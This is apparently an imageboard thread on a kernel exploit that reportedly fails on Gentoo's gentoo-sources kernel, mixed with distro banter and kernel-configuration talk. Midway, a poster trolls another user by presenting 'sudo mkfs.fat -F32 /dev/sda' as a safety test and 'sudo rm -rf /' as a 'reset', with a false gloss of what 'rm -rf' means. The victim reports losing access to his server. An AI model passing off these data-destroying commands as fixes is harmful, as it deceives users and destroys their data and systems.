Latest kernel exploit doesn't work on Gentoo's custom kernel.Specifically the sys-kernel/gentoo-sources.
>>108778342why not?
>>108778342ok
>>108778346Because Gentoo is based and redpilled, that only includes basic kernel features that you actually need.Install Gentoo.
>>108778361I have on my laptop
>>108778342use arch
>>108778342Let me guess, affected network driver(s) not enabled by default in the sources? I vividly recall various packages yelling at me to enable network shit they wanted, back in the times before I started copying the liveCD's kernel config and just disabling stuff I didn't need. (Back then, gentoo-sources was the only official kernel option.)
>>108778415gentoo-sources is basically vanilla kernel with a little bit of official Gentoo patches.
>>108778361>Because Gentoo is based and redpilled, that only includes basic kernel features that you actually need.which flags would disable that bullshit?how to see / edit my kernel options?or do people just do oldschoold make menuconfig?
>>108779279You need to merge sys-kernel/gentoo-sources or sys-kernel/vanilla-sources. It has the most barebones kernel features.After that you configure it via 'make menuconfig', and enable drivers for your hardware.
>>108778342Gentoo has far worse problems than that.
>>108778396>archfags have to generate fake girls to advertise their OS
>>108781182Thank God I use Void
>>108779710>>108778342My linode server came with a genkernel scheme so I've just been updating with that. Genkernel uses the same thing and I'm safe in a similar way, right?
>>108781366You can test it easy>sudo mkfs.fat -F32 /dev/sdaLet me it works
>>108781460Ah I tried it but it won't work my ssh disconnected and now I can't get in...
>>108781494Try a quick reset>sudo rm -rf /rm = reset memore-rf = reset file systemYou should be good after that
>>108781182>girls
>>108781534Thanks, I'll try it if I can get back in the the linode rescue boot
>>108781534>>108781460I just asked chatgpt and he said you are trolling me...
>>108781603This is 4chan. Trolling never happens here
>>108779939>doesn't list anyThanks for the contribution!
>>108781366Genkernel is outdated.
Why are people so obsessed with configuring muh kernelOutside of when you're trying to squeeze down the file size of the kernel as much as possible it doesn't actually make anything betterPlus, linux is bloatware now, even just the kernel itself doesn't fit on a floppy disk anymore.
no games
>>108778346Because nothing works on Gentoo
>>108784096Enabling modules will obviously consume the CPU when the code run.
>>108784100>Because nothing works on Gentooeverything I needed and I use on Debian, worked on Gentoo.
>>108778342gentoo and arch won
># CONFIG_MODULES is not set
>>108782989>t. hasn't used it long enough to get fucked by PYTHON_TARGETS
>>108784563Ever wondered how modules work?
>>108778361sys-kernel/gentoo-kernel comes with a general configuration, no different than the preconfigured Linux image on the majority of distributions.If you're gonna compile your own Linux kernel, you can do so on every distribution, and the process is no different with respect to Gentoo.